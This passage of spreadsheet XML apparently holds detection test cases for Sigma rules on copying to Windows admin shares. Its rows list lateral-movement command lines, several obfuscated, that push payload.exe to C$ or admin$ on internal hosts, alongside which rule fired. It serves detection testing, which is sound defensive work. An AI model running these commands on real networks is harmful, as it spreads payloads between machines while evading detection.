      <c r="H75" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J75" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B76" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C76" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D76" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E76" s="6" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F76" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J76" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B77" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C77" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D77" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E77" s="6" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F77" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G77" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J77" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B78" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C78" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D78" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E78" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F78" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G78" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J78" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B79" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C79" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D79" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E79" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F79" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G79" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J79" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="4" t="n"/>
      <c r="B80" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C80" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D80" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E80" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F80" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H80" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J80" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="4" t="n"/>
      <c r="B81" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C81" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D81" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E81" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F81" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J81" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="4" t="n"/>
      <c r="B82" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C82" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D82" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E82" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F82" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J82" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="4" t="n"/>
      <c r="B83" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C83" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D83" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E83" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F83" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J83" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="4" t="n"/>
      <c r="B84" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C84" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D84" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E84" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F84" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J84" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="4" t="n"/>
      <c r="B85" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C85" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D85" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E85" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F85" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J85" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="4" t="n"/>
      <c r="B86" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C86" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D86" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E86" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F86" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J86" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="4" t="n"/>
      <c r="B87" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C87" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D87" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E87" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F87" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J87" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="4" t="n"/>
      <c r="B88" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C88" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D88" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E88" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F88" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G88" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J88" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="4" t="n"/>
      <c r="B89" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C89" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D89" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E89" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F89" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J89" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="4" t="n"/>
      <c r="B90" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C90" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D90" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E90" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F90" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J90" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="4" t="n"/>
      <c r="B91" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C91" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D91" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E91" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F91" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J91" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="4" t="n"/>
      <c r="B92" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C92" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D92" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E92" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F92" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J92" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="4" t="n"/>
      <c r="B93" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C93" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D93" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E93" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F93" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J93" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="4" t="n"/>
      <c r="B94" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C94" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D94" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E94" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F94" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J94" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="4" t="n"/>
      <c r="B95" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C95" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D95" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E95" s="6" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F95" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J95" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="4" t="n"/>
      <c r="B96" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C96" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D96" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E96" s="6" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F96" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G96" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J96" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="4" t="n"/>
      <c r="B97" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C97" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D97" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E97" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F97" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J97" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="4" t="n"/>
      <c r="B98" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C98" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D98" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E98" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F98" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J98" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="4" t="n"/>
      <c r="B99" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_redirect_local_admin_share</t>
        </is>
      </c>
      <c r="C99" s="6" t="inlineStr">
        <is>
          <t>Suspicious Redirection to Local Admin Share</t>
        </is>
      </c>
      <c r="D99" s="6" t="inlineStr">
        <is>
          <t>ab9e3b40-0c85-4ba1-aede-455d226fd124</t>
        </is>
      </c>
      <c r="E99" s="6" t="inlineStr">
        <is>
          <t>copy C:\Windows\Temp\payload.exe \\127.0.0.1\admin$\payload.exe</t>
        </is>
      </c>
      <c r="F99" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J99" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="6" t="b">
        <v>0</v>
      </c>
